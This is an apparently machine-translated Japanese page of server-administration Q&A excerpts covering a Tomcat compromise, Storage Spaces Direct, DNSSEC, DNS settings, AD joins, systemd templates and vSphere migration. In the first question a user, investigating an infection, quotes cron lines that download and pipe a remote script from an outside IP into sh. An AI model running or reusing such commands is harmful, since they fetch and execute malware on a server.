サーバー管理者

システムおよびネットワーク管理者向けのQ&A

3
不明な起源のcronを介したApacheサーバーへのシェルスクリプト攻撃
Apache tomcatサーバーでプロジェクト戦争を実行しているときに、サーバーが危険にさらされていることがわかりました。 未知の世界で戦争をしている間、cronこんな風に走っています [root@App2 tmp]# crontab -l -u tomcat */11 * * * * wget -O - -q http://91.230.47.40/pics/logo.jpg|sh */12 * * * * curl http://91.230.47.40/pics/logo.jpg|sh ダウンロードは、logo.jpgマルウェアをダウンロードされたシェルスクリプトを持っています。 以下のこのウェブサイトで同様の問題を見つけました https://xn--blgg-hra.no/2017/04/covert-channels-hiding-shell-scripts-in-png-files/ そして /security/160068/kworker34-malware-on-linux 私のコード全体でこのcronスケジューラの起源を見つけることができません。 誰かがこの問題に直面していることを知りたいのですか?コードでスケジューラの起源を見つけるにはどうすればよいですか。 注意: JAVA(Struts 2)+ jsp + javascript + jquery Webプロジェクトに取り組んでいます。 このスケジューラは、プロジェクトのwarファイルでTomcatを起動するたびに実行されますが、コード内にスケジューラのスケジューラを見つけることができません。 ログファイルで次の行を見つけました [INFO] 2017-06-02 17:00:41,564 org.apache.struts2.dispatcher.Dispatcher info - …

2
記憶域スペースダイレクトが自動的にディスクを追加しないようにする方法はありますか?
ストレージスペースダイレクト(S2D)を使用するSQLフェールオーバークラスターインスタンス(FCI)をホストしている2016 Windows Serverフェールオーバークラスター(WSFC)で問題が発生しました。各サーバーで、最初の作成が成功した後、S2Dは、未使用のRAIDボリュームをストレージプールに自動的に追加しました(ただし、S2DはRAIDボリューム上に作成できず、レイドされていないディスクを要求します)。今、それは壊れています-私が理解できる限り-それは正確です。その結果、仮想ディスクがオフラインになり、クラスター全体が停止します。クラスタネットワークリソースが不足しているため、オンラインに戻りません。問題のディスクは廃止することはできますが、削除することはできません。仮想ディスクの修復が実行されず、クラスターの互換性テストで無効な構成が報告されています。 これは新しいセットアップです。そのため、仮想ディスク、クラスター、さらにはサーバーを削除して、最初からやり直すことができます。しかし、生産性を上げる前に、これを二度と起こさないことを確認する必要があります。サポートされていないディスクを不必要に誤って追加するだけで、仮想膝でシステム自体をクラッシュして停止させるシステムは、私たちが展開できるプラットフォームではありません。だから、私は主に、今それを修復するのではなく、これが起こらないようにする方法が必要です。私の推測では、S2Dセットアップが、作成されたディスクよりも多くのディスクを取得しないようにすると、うまくいくと思います。実際のディスク交換中に手動で操作する可能性のあるコストは、クラスターにとっては無視できるほどのものです...ここにあります。ただし、これまでにドキュメントを参照していたので、それを制御する方法はありません。私が何かを逃していない限り、Set-StoragePoolも、 ヘルプやヒントをいただければ幸いです。 上記の詳細は次のとおりです。2台のHPE DL380 Gen9サーバーマシンが、RDMA対応の10GBイーサネットと1GBを介してクライアントネットに二重に接続されています。それぞれにRAIDコントローラHPが搭載されています??? シンプルなHBAコントローラーHP ??? (S2Dが絶対に必要であり、直接接続されたレイドされていないディスクでのみ機能するため)。ストレージ構成は、RAIDコントローラーのOS-RAID、RAIDコントローラーのFiles-RAID、およびS2D用のHBAに直接接続されたディスクのセットで構成されます。 OS-RAIDに2つのWindows Servers 2016データセンターエディションをセットアップし、WSFC機能をインストールし、S2Dオプションを含むクラスター互換性テストを実行して合格し、ストレージなしでクラスターを作成し、ファイル共有監視(別のマシン上)を追加し、S2Dを有効にしましたレイドされていないすべてのディスクで自動的に構成されるストレージプール上で、そのプールの上にミラータイプの仮想ディスクを作成し、NTFSをファイルシステムとして使用しました。これは、これがSQL FCIの選択のFSであるためです。インストール。 次に、SQL 2016スタンダードエディションをFCIとしてそのクラスターにインストールし、データベースをインポートして、すべてテストしました。すべてが大丈夫でした。データベースはそこにあり、かつてないほど高速でした。自動フェイルオーバーだけでなく強制も簡単でした。すべてが良さそうでした。 翌日、残りのFiles-RAIDを利用しようとしました。事前構成が気に入らなかったため、最初にRAIDレベルを変更しました。事前構成されたRAIDボリュームを削除して新しいボリュームを(各サーバーで)構築した直後に、クラスターがダウンしていることが検出されました。私がこれまでに理解できたことから、その間に事前構成されたFiles-RAIDボリュームが自動的にプールに追加され、削除したばかりなので、プールから失われました。チェックしたところ、新しいFiles-RAIDが見つかりましたが、まだ作成されていて、プールの物理ドライブとして既に表示されています。そのため、プールには各サーバーに2つのRAIDボリュームが含まれ、そのうちの1つは存在しませんでした。これらのボリューム(ディスクではない)は、HBA上の実際の物理ディスクと共にGet-PhysicalDiskによって一覧表示されます。これが定期的かどうかはわかりません。 それらの物理ディスク(つまり、実際にはRAIDボリュームであるもの)を廃棄することができましたが、それらは廃棄済みとしてマークされています。しかし、それらはまだプールにあり、今すぐ削除することはできません。削除しようとしても失敗します。Repair-VirtualDiskは、残りのディスクだけで仮想ディスクを適切な状態に再構築する必要があります(私はこれを行った:https : //social.technet.microsoft.com/Forums/windows/en-US/dbbf317b-80d2-4992- b5a9-20b83526a9c2 / storage-spaces-remove-physical-disk?forum = winserver8gen)ですが、このジョブはすぐに終了し、「成功」します。もちろん、影響はありません。 仮想ディスクをオンラインに戻そうとすると、ネットワークに接続されたクラスターリソースが利用できないことを示して失敗します。私が理解している限り、不足しているディスクはクラスターリソースではないため、これは(利用可能な)ストレージプールのみを参照できます。プールには修正するエラーは表示されません。クラスター互換性テストを実行すると、クラスターに適していない構成が要求されます。 もう1インチぐらつく可能性のある部分が見つからないので、全体が行き詰まっているように見えます。実行中のWSFCがそのように機能しないようにする方法に関するアイデアはありますか? 特に啓蒙的なエラーメッセージは表示されませんでした。また、すべてを投稿してページを爆撃したくありませんでした。誰かが具体的な詳細を知りたければ、私に知らせてください。 皆さん、ありがとうございました! カルステン Raspberry氏の要求に応じて更新する


1
ドメインからDNSSECサポートを削除する方法
組織は、ドメインに対してDNSSECをサポートしています。キーを管理する権限のあるネームサーバーとしてBIND9が実行されています。ただし、DNSSECを削除することが決定されました。鍵の素材を削除し/var/lib/bind/priてサーバーを再起動するだけで十分ですか、それを取得するために実行する必要がある手順はありますか?
8 debian  bind  dnssec 

2
これらのDNS設定は良い考えですか?
ドメインコントローラー、DHCPおよびDNSサーバーとして機能する1つのWindowsサーバーを備えた非常に小規模な(5ワークステーション)ネットワークがあります。すべてのデバイスは標準のスイッチに接続され、スイッチは標準のブロードバンドモデムに接続されます。 各ワークステーションのTCPネットワーク設定は次のとおりです。 192.168.0.50DNSサーバーのIPです。 192.168.0.1モデムゲートウェイのIP 8.8.8.8はGoogleのパブリックDNSサーバーです これは良い計画ですか?そのリストにモデムのIPを含むポイントはありますか?Windows DNSサーバーがパブリックWebサイトのリクエストを受信して​​キャッシュしていることに気づきました。Google DNSサーバーはリストの上位にあるべきですか?

4
Ubuntu Server 17.04をWindows ADに結合する:同様にvs Centrify vs Winbind vs SSSD
既存のWindows ADドメイン(Windows Server 2016)に参加する必要があるUbuntu Server 17.04ホストがかなりあります。これまでに行ったことはありませんが、これを実現するためのいくつかの方法は知っています。たとえば、Centrify、SSSD、Winbindなどです。 一般的な経験を共有して、これらの各ソリューションの信頼性が高く、構成/保守が容易であることを教えてください。 また、このトピックをカバーする最新の記事/マニュアルへのリンクを共有できれば、すばらしいと思います。私が見つけたのは3〜5年前のものだけで、期待どおりに機能しないためです。 どうもありがとうございました!

1
systemdユニットファイルをオーバーライドしてテンプレートユニットファイルを作成することはできますか?
systemdは、パッケージが提供するユニットファイルをオーバーライドして、サービスの構成/動作に影響を与える優れたメカニズムを提供することを知っています。これは通常、以下のコマンドを使用して行われます sudo systemctl edit <unitfile> オーバーライドconfファイルを作成するには /etc/systemd/system/<unitfile.d>/ Systemdは、テンプレートユニットファイルを定義するための別個のメカニズムも提供し、インスタンス化して実行時にインスタンス固有のユニットを作成します。これには、テンプレートファイルに次の名前を付ける必要があります。 <servicename>@.service そしてそれを次のようにインスタンス化します systemctl start <servicename>@<instancename> 現在、パッケージが提供するサービスを複数のユニットインスタンスとして実行したい状況です。独自のテンプレートユニットファイルの作成を避けたいので、パッケージ提供のユニットファイルをオーバーライドしてテンプレートユニットファイルを作成できるかどうかを確認しようとしています。 私の理解では、テンプレートユニットファイルには通常のユニットファイルとは異なる命名規則があるため、パッケージで提供されるユニットファイルを/ etc / systemd / systemに配置してテンプレートファイルで上書きすることはできないと思います。 私がやろうとしていることを達成するための明確な方法はありますか? 特定のシナリオ:grafanaパッケージは、grafana-server.serviceユニットファイルをインストールします。私のマシンで2つのインスタンスのgrafanaを実行したいと思います-DEVとSTG用にそれぞれ1つ。私はこれを行うことができました: grafana-server.serviceファイルを変更(%Iを使用してフォルダーの場所とファイルパスを設定) 変更されたgrafana-server.serviceの名前をgrafana-server @ .serviceに変更します 次を使用してgrafanaのインスタンスを開始します。 sudo systemctl start grafana-server@dev そして sudo systemctl start grafana-server@stg ただし、これにより、grafanaが提供するサービスユニットファイルからのリンクが解除されます。アップグレード時にサービスファイルが拡張される場合は、このアクティビティを再度やり直す必要があります。私の目的は、この直接の依存関係を回避し、代わりにそれをオーバーライド依存関係に変換することです。 何かご意見は?
8 linux  systemd 

1
vSphere 5.5から別のデータセンター6.5への移行
ESXi 5.5ホストに基づくデータセンターの1つから6.5環境の新しいデータセンターに本番VMを移行することを計画しています。データセンターはさまざまな場所にあります。 したがって、私たちの製品は150近くのVMで構成されています。ネットワーク接続を設定し、VMwareコンバーターでいくつかのテストVMを転送しようとしましたが、移行のパフォーマンスはよくありませんでした。データセンター間のネットワークへのアクセスが制限されているため、レプリケーションをセットアップできません。データセンターを管理していた人が会社を辞めてしまったので、私にはそれを実行する必要があります。 移行する別のオプションはありますか?5.5から6.5への移行にはいくつかの制限がありますか?

1
SQL FCIに最大2M IOPSを提供するS2Dのセットアップ
Microsoft SQL Serverフェールオーバークラスター(FCI)を実装するために、超高速ストレージ用の共有ストレージリサーチを導入しようとしています。これまでのところ、プロジェクトでは、70k / 30wのパターンで、8kブロックに対して500K IOPSから始めます。また、SQLサーバーの期待の高まりにより、1年程度で最大2M IOPS(同じパターンの場合)までパフォーマンスを向上させる機能が必要です。 プロジェクトの目的のために、Microsoft Storage Spaces Direct(S2D)の4ノードクラスターを展開します。ハードウェアに関しては、2x E5-2697と512GB RAMを備えた2xデルラックサーバーR730xdがすでにあり、さらに2つ入手する準備ができています。 ストレージについては、最大のパフォーマンスを得るためにNVMeまたはNVMe + SSDを使用することをお勧めします(ソース)。したがって、いくつかの調査の後、Samsung SSDが適しています。https://www.starwindsoftware.com/blog/benchmarking-samsung-nvme-ssd-960-evo-m-2 http://www.storagereview.com/samsung_960_pro_m2_nvme_ssd_review 検討するセットアップは次のとおりです。S2Dホストごとに1x Samsung 960 EVO NVMe + 4x Samsung PM863 SSD。 Samsung 960 EVO NVMeとSamsung PM863を使用したS2D実装は、SQL FCIに500kを提供できますか? 編集: a)先日、似たような質問をしませんでしたか?- やった。最初のショットが主題外だったため、新しい質問が投稿されました。件名と本文が変更されます。前の質問は削除されます。 b)それらはコンシューマドライブです。問題は、開始時に必要な500k IOPSを収容できるS2Dのセットアップを見つけることです。どのようなセットアップをお勧めしますか? c)これらすべての接続をどのように計画していますか?5 x M.2スロットを備えたサーバーはありません-これを知っておく必要があります-各ノードにつき1x M.2ドライブのみが使用されます。共有ストレージの設定を修正しました。S2Dホストごとに1x Samsung 960 EVO NVMe + 4x Samsung …

4
IPアドレスに基づいて特定のページを提供することは可能ですか?
私は自分が所有する2つのWordPressサイトに対するブルートフォース攻撃の標的にされてきました。攻撃者は古き良きXML-RPCを使用して、ブルートフォースパスワード攻撃を増幅しています。幸い、私たちは非常によく生成されたパスワードを持っているので、彼がこれまでどこにでもアクセスすることはないと思います。 私はiptablesを使用して彼が再びポップアップするたびに(常に同じ仮想クラウドプロバイダーから)要求をブロックしましたが、サーバーを変更して、彼のIPアドレスがページを要求するたびに、彼に応答を返すようにします命を得るために。リクエストのほとんどはPOSTであるため、理想的には、応答ヘッダーを変更して、「次回は幸運を祈る」などの内容を含めるようにします。または同等に満足できる何か。 これは可能ですか?私はApacheの専門家とはほど遠いので、これを実装するのがどれほど難しいかはわかりません。しかし、それが私に数時間かかるとしても、満足は貴重です。 参考までに、私はWordpress 4.7.3をホストするApache 2.4.18でUbuntu 16.04.2 LTSを実行しています。


3
ESXi HAクラスターの共有ストレージオプション
ESXi HAクラスターをサポートするための共有ストレージオプションの推奨事項を探しています(製品/ブランド/モデルの推奨事項は求めていません -これはここのルールに違反していることを知っています)。私は尋ねるための技術勧告。 私が働いている会社は中小企業です。現時点では、カスタム開発されたアプリケーションを実行する1つのHP DL380 G9とDAS、ESXi 6.0を使用しています。現在、最も経済的なオプションを使用してHA / FTを実現する方法を検討しています。私は1人のITチームであり、頻繁に出張しているため、手動でフェイルオーバー/復元することはできないため、HA / FTが必要です。 HA / FTを実現するには、最低2つのESXiホスト(物理サーバー)と共有ストレージが必要であることを理解しています。これは興味深いところです。最も安価なエントリーレベルのストレージアレイでさえ、おそらく私たちにとってはやり過ぎです。私たちのストレージ容量の要件はおそらく約200GBであり、少なくとも5年間はその倍増は見られません。しかし、HA / FTには共有ストレージが必要です。 したがって、私のオプションについての推奨は本当に本当にありがたいです。ありがとう。

1
粘着面が1つのゴムの長方形+サーバーマウント
新しい2.5インチハードドライブを購入して1uサーバーに取り付けました。まず、ホットスワップ可能なマウントにネジでねじ込み、次に差し込みました。ホットスワップ可能なマウント(画像は添付)には、小さなゴム製の長方形の接着剤が1つ付いています。側。 私はサーバーハードウェアが初めてで、それらを構築しています。しかし、私はこれの用途を見つけることができませんでしたか?誰が彼らが何のために使われているのか知っていますか?HDと交換可能なマウントの間で振動や何かが止まってしまうのではないかと思っていましたが、そこには収まりません。 ゴムビット:

1
vCenter Serverの更新手順[終了]
休業。この質問には、より焦点を当てる必要があります。現在、回答を受け付けていません。 この質問を改善してみませんか?質問を更新して、この投稿を編集するだけで1つの問題に焦点を当てます。 3年前休業。 vCenter Server 6.0 4541947を実行している環境にFTストレージを実装することを決定する過程で、ソリューションを実装する前にvCenterをアップグレードしたいと思いました。 私たちのインフラストラクチャは、3x400gb SSDおよび6x1.6 15k NLSAS HDDドライブを備えた3xR730に基づいており、約70台のVMを実行しています。 VMFS 5とVMFS 6の両方を保持することは可能ですか?

2
記憶域スペースダイレクトを備えたスケールアウトファイルサーバー
みんな!インフラストラクチャを最近アップグレードした後、いくつかの新しいハードウェアを試したり、ストレージ目的で使用したりしたい廃止されたハードウェアの束を手に入れました。そのため、6 x HDDと2 x SSDを内蔵した4 x DELL R630サーバーがあります。ドライブSMARTは緑なので、これらのサーバーを高可用性の専用ストレージクラスターとして利用したいと思います。新しいWindows 2016 Storage Spaces Directテクノロジーを専用のスケールアウトファイルサーバークラスターとして試してみたいので、4つのMellanox Connectx4デュアルポート10 Gbe NICを注文しました。このような構成を適切に展開する方法を知っていますか?このシナリオのトラブルやデメリットはありますか?すべての公式ガイドはハイパーコンバージドアプローチのみを扱っているため、専用のSoFSの短いステップバイステップのガイダンスは素晴らしいでしょう!

弊社のサイトを使用することにより、あなたは弊社のクッキーポリシーおよびプライバシーポリシーを読み、理解したものとみなされます。
Licensed under cc by-sa 3.0 with attribution required.